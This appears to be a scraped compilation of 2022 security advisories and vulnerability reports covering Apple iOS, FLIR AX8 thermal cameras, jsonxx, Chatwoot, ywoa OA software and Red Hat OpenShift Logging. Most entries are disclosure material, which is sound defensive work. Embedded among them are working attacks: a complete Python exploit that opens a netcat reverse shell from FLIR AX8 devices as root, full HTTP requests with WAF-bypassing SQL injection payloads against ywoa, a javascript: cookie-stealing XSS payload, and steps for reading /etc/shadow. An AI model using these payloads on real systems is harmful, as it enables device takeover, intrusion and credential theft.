Apple Security Advisory 2022-08-17-1 - iOS 15.6.1 and iPadOS 15.6.1 addresses code execution and out of bounds write vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-08-17-1 iOS 15.6.1 and iPadOS 15.6.1iOS 15.6.1 and iPadOS 15.6.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213412.KernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privileges. Apple is aware of a report that this issue mayhave been actively exploited.Description: An out-of-bounds write issue was addressed with improvedbounds checking.CVE-2022-32894: an anonymous researcherWebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: An out-of-bounds write issue was addressed with improvedbounds checking.WebKit Bugzilla: 243557CVE-2022-32893: an anonymous researcherThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.6.1 and iPadOS 15.6.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmL9UiMACgkQ4RjMIDkeNxkiuw/+IhqxvCCS9q8hQMHDpFvVVmFdfO+7ukTVSpd12Cp5r0VGVP/zJOCecXR1cnFHIPx8zVZXzQzsa+lCSWhT+20qOiuCjpqWNVY9pCovCPds3r1hhL2/1H0KejGK2Ms910r+yxvEmhzz0MPk95d5+k+LaBPC1sfuNVTn9eUXImPDuLzLIyd8nW5khjNWspOIlS82VNBAcw8VQMxjgsiD6lhSsqvdkBPNhbI4/mMeIEXOOb+fRtHUOtorGLF2R1DzU1zmPLytcPGE+hxVXnR5F1z/+ea1DEWumvzSNfwja9HI2xPfmm9E8Pomq9lkSEW8cxlqAdKY2/cQ2B2I7ihJ3REfJjSnhXqTsuad1jVn9k1t8ZmKBWh6bgOQKQQg9BfIhcCeL398fmRUZQG1h6zo33MukUMMjfTgRjrjxhETLYCZQybjFAC4s98j2S0oyUpKaBUHc+tL/uupW01LwzP53SR2e4rBQhi+ACqiCEoJKAHYfJaj6YeblILiM6SaQdfbsiCzSIqM6nJLl5ZIYn6rXEEKGyGpKMAYXvc7FsR691DTQxMiQ8KcraoCwAerLzviWOF2tVNmDYkv5EFnXhSB4+uYzViSQhPKM8s2DRhP/WhxdVF3woRhIyHLq60SqKoFKvQwTVTugIFIR4cGfsfAbV7zCBhqH7+fKBGfLeTOBCH7ULE=SLRt-----END PGP SIGNATURE-----

Apple Security Advisory 2022-08-17-1

FLIR AX8 versions 1.46.16 and below suffer from command injection, directory traversal, improper access control, and cross site scripting vulnerabilities.

# FLIR AX8 vulnerabilities.

### Product description:

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Affected products:  
All FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

### Summary of the 4 vulnerabilities found / What we were able to find:

* [CVE-2022-37061] - Unauthenticated OS Command Injection.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37060] - Unauthenticated Directory Traversal.

FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37062] - Improper Access Control.

FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.  A successful exploit could allow the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. 

* [CVE-2022-37063] - Reflected cross-site scripting.

FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:

1. Unauthenticated Remote Command Injection.

The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file.

The server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands.

2. Unauthenticated Directory Traversal.

The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file.

The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight.

3. Improper Access Control.

The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database.

4. Reflected cross-site scripting.

In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call 

<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run

### Recommendations for how to fix the 4 vulnerabilities:

* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. 

More info:   
https://www.php.net/intval  
https://www.php.net/manual/en/function.escapeshellcmd  
https://www.php.net/manual/en/function.escapeshellarg

* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

More info:  
https://www.php.net/manual/en/function.pathinfo

* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`.

More info:  
https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

More info:   
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

### Reference:  
https://www.flir.com/products/ax8-automation/

### Security researchers:  
* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)  
* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

FLIR AX8 1.46.16 Traversal / Access Control / Command Injection / XSS

Jsonxx or Json++ is a JSON parser, writer and reader written in C++. In affected versions of jsonxx use of the Value class may lead to memory corruption via a double free or via a use after free. The value class has a default assignment operator which may be used with pointer types which may point to alterable data where the pointer itself is not updated. This issue exists on the current commit of the jsonxx project. The project itself has been archived and updates are not expected. Users are advised to find a replacement.

CVE-2022-23459

Cross-site Scripting (XSS) - DOM in GitHub repository chatwoot/chatwoot prior to 2.7.0.

**Title**

XSS in markdown link-maker

**Description**

While chatting with a client, both sides may use markdown. However, neither client's nor Chatwoot inner user's input is verified.

**Steps to reproduce.**

Note: this works in Safari and Firefox, not Chrome.

I will use Telegram bot.

1.  1\. Start a conversation as an attacker with Chatwoot staff using created Telegram bot.
2.  2\. Send payload [clickMe](javascript:alert(document.cookie)) as a message.
3.  3\. As a Chatwoot staff click on the link, trigger an XSS.

Also it is possible to create a malicious link as a staff (e.g. leave it in other's staff conversation in order to trigger an XSS on their side).

1.  1\. While intercepting your traffic send a message [clickMe](https://google.com) to pass frontend check.
2.  2\. In the outcoming POST request to /api/v1/accounts/2/conversations/1/messages modify the body, so it looked something like this:

    {
        "content":"[click](javascript:alert(document.cookie))",
        "private":false,
        "echo_id":"{yourId}",
        "cc_emails":"",
        "bcc_emails":""
    }
    

3.  3\. As some other staff click on the link, trigger an XSS.

I'm leaving a video PoC for both cases:

Video PoC

**Possible remediation**

Verify message content.

**Impact**

This vulnerability is capable of running an arbitrary JS code.

CVE-2022-0542: Cross-site Scripting (XSS) - DOM in chatwoot

Yimioa v6.1 was discovered to contain a SQL injection vulnerability via the orderbyGET parameter.

**ywoaSQL-Inject-Bypass****Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

http://partner.yimihome.com/static/index.html#/index/sys\_env

**1, personnel - personnel information - orderbyGET parameter SQL injection**

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass Payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment  
  
One-click installation, after the installation will prompt the system has expired, go to setup and take a look  
  
Until June 1, but it's okay, here to change the system time can be  
  
  
Login successfully

**Code audit****1\. Personnel - personnel information - orderbyGET parameter SQL injection**

  

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname\_cond=0&realname=test18&sex=&sex\_cond=1&dept=&dept\_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

**SQL injection Bypass**

The above injection payload is as follows

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment  
  
After building it, debug it remotely with idea  
  
When you try to reproduce this vulnerability again, you will be prompted with an XSS interception  
  
  
It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code  
  
The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here  
  
Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic  
  
Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic  
Next you will come to Antixss.Java

    src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java
    

  
The antiXSS method is called by passing in the html to be detected and a true  
  
Follow directly in to see  
  
Check the \_antiXSS method, where the content is passed in is the content to be detected  
  
Here is the specific detection logic, but I'm only looking at the stripScriptTag method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected  
  
Mainly by means of regularity and case-insensitive because of CASE_INSENSITIVE  
  
Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know  
  
Remove AND  
  
The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can  
  
statement returns normally, then after returning here  
  
Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the isValidSqlParam method  
  
Follow the sql_inj method  
  
We have already bypassed the detection of and and need to bypass the code logic in the second box  
  
The main logic here is to separate inj\_str using |, which will generate a list to inj\_stra\[\], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj\_stra\[i\] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned  
  
  
In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select  
Here I was going to try to use

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' will be detected as XSS, so this method does not work  
  
The && here needs to be converted to url encoding, otherwise this request will report 400  
  
So we can only think of ways to select this keyword, here is a bypass of the payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

  
Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the sql_inj method  
  
So there is no way to capitalize to bypass

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

**Function implementation entrance**

  
  
First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic  
  
Continue to the next page  
  
Here is the OA developer's own implementation of the SQLBuilder class  
  
  
Follow this method  
  
Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection  
  
Follow up this listResult method  
  
The statements will then be spelled out in the middle  
  
The executeQuery statement is then executed  
  
The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in  
  
This is followed by a return, which is executed here with a 5-second wait, so it causes an injection

CVE-2022-36605: ywoa SQL inject Bypass and Analysis of the article · Issue #24 · cloudwebsoft/ywoa

Ywoa before v6.1 was discovered to contain a SQL injection vulnerability via /oa/setup/checkPool?database.

**Environment construction**

http://partner.yimihome.com/static/index.html#/index/sys\_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

**\[Frontend\] <6.1 Version Unauthorized SQL Injection**

  
Through the apikit interface fuzz found an interface that can be unauthorized requests, find the corresponding implementation method in the code  
Prerequisite: this hole has a condition, that is, the need for less than 6.1 version, the specific why directly on the code src/main/java/com/cloudweb/oa/controller/ApplicationController.java  
  
The above does not need to care, specifically note the following if(isValid)  
  
First get the version from the configuration  
  
Get to version 6.1, then start the version determination  
  
Determine if it is less than 3  
  
Determine if it is less than 4  
  
Determine if it is less than 5  
  
Determine if it is equal to 6  
  
The condition to be used here is that the version needs to be <= 6 in order to be successful  
So change the version  
  
You also need to change one more location, you need to change the version of the database, otherwise the login will prompt the version is inconsistent, the database and configuration file version judgment class in src/main/java/com/cloudweb/oa/service/LoginService.java  
  
  
Just change the value of the version field in the oa\_sys\_ver table in the database  
  
Restart tomcat after the change, and then request the specified interface without logging in

POST /oa/setup/checkPool?database=test' HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

Found that the return here actually has a return, will prompt the SQL statement to report an error  
  
Here we bring out the user directly with extractvalue  
  
**POC**

and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))\--+

**HTTP**

POST /oa/setup/checkPool?database=test'and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+ HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

CVE-2022-36606: yimiYWOA<6.1 version foreground unauthorized SQL injection · Issue #25 · cloudwebsoft/ywoa

FLIR AX8 versions 1.46.16 and below unauthenticated remote OS command injection exploit.

    # -*- coding: utf-8 -*-# Exploit Title: FLIR AX8 Unauthenticated OS Command Injection# Date: 8/19/2022# Exploit Author: Samy Younsi Naqwada (https://samy.link)# Vendor Homepage: https://www.flir.com/# Software Link: https://www.flir.com/products/ax8-automation/# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok# Version: 1.46.16 and under.# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)# CVE : CVE-2022-36266from __future__ import print_function, unicode_literalsfrom bs4 import BeautifulSoupimport argparseimport requestsimport jsonimport urllib3urllib3.disable_warnings()def banner():  flirLogo = """ ███████╗██╗     ██╗██████╗ ██╔════╝██║     ██║██╔══██╗█████╗  ██║     ██║██████╔╝██╔══╝  ██║     ██║██╔══██╗██║     ███████╗██║██║  ██║ ╚═╝     ╚══════╝╚═╝╚═╝  ╚═╝                          .---------------------.   █████╗ ██╗  ██╗ █████╗  /--'--.------.--------/|  ██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||  ███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||  ██╔══██║ ██╔██╗ ██╔══██╗ |       |( () )|      ||  ██║  ██║██╔╝ ██╗╚█████╔╝ |       | `--` |      |/  ╚═╝  ╚═╝╚═╝  ╚═╝ ╚════╝  `-------`------`------`                                                                                                                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(flirLogo))def pingWebInterface(RHOST, RPORT):  url = 'http://{}:{}/login/'.format(RHOST, RPORT)  response = requests.get(url, allow_redirects=False, verify=False, timeout=60)  try:    if response.status_code != 200:      print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    version = soup.find('p', id = 'login-title').string    print('[INFO] {} detected.'.format(version))  except:    print('[ERROR] Can\'t grab the device version...')def execReverseShell(RHOST, RPORT, LHOST, LPORT):  url = 'http://{}:{}/res.php'.format(RHOST, RPORT)  payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LPORT)  data = 'action=alarm&id=2;{}'.format(payload)  headers = {    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',  }  try:    print('[INFO] Executing reverse shell...')    response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)    print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))    return  except Exception as e:      print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)      return Falsedef main():  banner()  args = parser.parse_args()  pingWebInterface(args.RHOST, args.RPORT)  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__":  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)  parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  main()

FLIX AX8 1.46.16 Remote Command Execution

Red Hat Security Advisory 2022-6051-01 - An update is now available for RHOL-5.5-RHEL-8. Issues addressed include denial of service, man-in-the-middle, and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update  
Advisory ID:       RHSA-2022:6051-01  
Product:           RHOL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6051  
Issue date:        2022-08-18  
CVE Names:         CVE-2021-38561 CVE-2022-0759 CVE-2022-1012  
                   CVE-2022-1292 CVE-2022-1586 CVE-2022-1785  
                   CVE-2022-1897 CVE-2022-1927 CVE-2022-2068  
                   CVE-2022-2097 CVE-2022-21698 CVE-2022-30631  
                   CVE-2022-32250  
====================================================================  
1. Summary:

An update is now available for RHOL-5.5-RHEL-8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.5.0 - Red Hat OpenShift

Security Fix(es):

* kubeclient: kubeconfig parsing error can lead to MITM attacks  
(CVE-2022-0759)

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks  
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-1415 - Allow users to tune fluentd  
LOG-1539 - Events and CLO csv are not collected after running `oc adm must-gather --image=$downstream-clo-image `  
LOG-1713 - Reduce Permissions granted for prometheus-k8s service account  
LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created.  
LOG-2134 - The infra logs are sent to app-xx indices  
LOG-2159 - Cluster Logging Pods in CrashLoopBackOff  
LOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages.  
LOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL  
LOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext.  
LOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not  be collected.  
LOG-2242 - Log file metric exporter is still following /var/log/containers files.  
LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed  
LOG-2264 - Logging link should contain an icon  
LOG-2274 - [Logging 5.5] EO doesn't recreate secrets kibana and kibana-proxy after removing them.  
LOG-2276 - Fluent config format is hard to read via configmap  
LOG-2290 - ClusterLogging Instance status in not getting updated in UI  
LOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1  
LOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint.  
LOG-2300 - [Logging 5.5]ES pods can't be ready after removing secret/signing-elasticsearch  
LOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck  
LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously  
LOG-2333 - Journal logs not reaching Elasticsearch output  
LOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record.  
LOG-2342 - [Logging 5.5] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority"  
LOG-2384 - Provide a method to get authenticated from GCP  
LOG-2411 - [Vector] Audit logs forwarding not working.  
LOG-2412 - CLO's loki output url is parsed wrongly  
LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type  
LOG-2418 - EO supported time units don't match the units specified in CRDs.  
LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong  
LOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift  
LOG-2444 - The write index is removed when `the size of the index` > `diskThresholdPercent% * total size`.  
LOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster.  
LOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack.  
LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices  
LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]  
LOG-2522 - CLO supported time units don't match the units specified in CRDs.  
LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready.  
LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster  
LOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector.  
LOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data  
LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated.  
LOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate  
LOG-2599 - Supported values for level field don't match documentation  
LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert  
LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect  
LOG-2619 - containers violate PodSecurity -- Log Exporation  
LOG-2627 - containers violate PodSecurity -- Loki  
LOG-2649 - Level Critical should match the beginning of the line as the other levels  
LOG-2656 - Logging uses deprecated v1beta1 apis  
LOG-2664 - Deprecated Feature logs causing too much noise  
LOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster  
LOG-2693 - Integration with Jaeger fails for ServiceMonitor  
LOG-2700 - [Vector] vector container can't start due to "unknown field `pod_annotation_fields`" .  
LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance  
LOG-2725 - Upgrade logging-eventrouter Golang  version and tags  
LOG-2731 - CLO keeps reporting `Reconcile ServiceMonitor retry error` and `Reconcile Service retry error` after creating clusterlogging.  
LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration  
LOG-2742 - unrecognized outputs when use the sts role secret  
LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs  
LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active_primary" instead of "active" shards.  
LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo  
LOG-2763 - [Vector]{Master} Vector's healthcheck fails when forwarding logs to Lokistack.  
LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image  
LOG-2765 - ingester pod can not be started in IPv6 cluster  
LOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy  
LOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx  
LOG-2773 - No cluster-logging-operator-metrics  service in logging 5.5  
LOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack.  
LOG-2784 - Japanese log messages are garbled at Kibana  
LOG-2793 - [Vector] OVN audit logs are missing the level field.  
